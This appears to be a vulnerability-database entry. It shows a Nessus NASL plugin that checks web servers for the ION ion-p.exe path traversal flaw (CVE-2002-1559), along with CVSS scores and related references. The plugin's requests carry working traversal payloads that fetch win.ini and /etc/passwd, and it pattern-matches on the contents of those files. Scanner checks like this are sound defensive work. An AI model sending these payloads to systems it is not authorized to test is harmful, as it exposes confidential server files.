Lucene search
This script is Copyright (C) 2003-2021 John LampeION_P.NASLHistoryJun 11, 2003 - 12:00 a.m.
ION ion-p.exe page Parameter Traversal Arbitrary File Retrieval
2003-06-1100:00:00
This script is Copyright (C) 2003-2021 John Lampe
www.tenable.com
72
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS
0.023
Percentile
89.7%
The ion-p.exe exists on this web server. Some versions of this file are vulnerable to remote exploit. An attacker, exploiting this vulnerability, may be able to gain access to confidential data and/or escalate their privileges on the web server.
#%NASL_MIN_LEVEL 70300
#
# This script was written by John [email protected]
#
# See the Nessus Scripts License for details
#
# Changes by Tenable:
# - Revised plugin title (4/16/009)
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(11729);
script_version("1.26");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2002-1559");
script_bugtraq_id(6091);
script_name(english:"ION ion-p.exe page Parameter Traversal Arbitrary File Retrieval");
script_summary(english:"Checks for the ion-p.exe file");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is hosting an application that is affected by
an information disclosure vulnerability.");
script_set_attribute(attribute:"description", value:
"The ion-p.exe exists on this web server. Some versions of this file
are vulnerable to remote exploit. An attacker, exploiting this
vulnerability, may be able to gain access to confidential data and/or
escalate their privileges on the web server.");
script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=103617461516386&w=2");
script_set_attribute(attribute:"solution", value:
"There is no known solution at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value:"2003/06/11");
script_set_attribute(attribute:"vuln_publication_date", value:"2002/11/01");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_ATTACK);
script_copyright(english:"This script is Copyright (C) 2003-2021 John Lampe");
script_family(english:"CGI abuses");
script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80, embedded:TRUE);
if(!get_port_state(port))exit(0);
flag = 0;
directory = "";
foreach dir (cgi_dirs()) {
req = http_get(item: dir + "/ion-p.exe?page=c:\\winnt\\win.ini", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if( res == NULL ) exit(0);
if (egrep(pattern:".*\[fonts\].*", string:res, icase:TRUE)) {
security_warning(port);
exit(0);
}
req = http_get(item: dir + "/ion-p.exe?page=../../../../../etc/passwd", port:port);
res = http_keepalive_send_recv(port:port, data:req);
if (egrep(pattern:".*root:.*:0:[01]:.*", string:res))
{
security_warning(port);
exit(0);
}
}
Related
cvelist
cvelist
CVE-2002-1559
2003-03-18 05:00:00
nvd
nvd
CVE-2002-1559
2003-03-31 05:00:00
cve
cve
CVE-2002-1559
2003-03-31 05:00:00
openvas
openvas
ion-p/ion-p.exe Directory Traversal Vulnerability
2005-11-03 00:00:00
exploitdb
exploitdb
ION Script 1.4 - Remote File Disclosure
2002-11-01 00:00:00
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS
0.023
Percentile
89.7%
Related for ION_P.NASL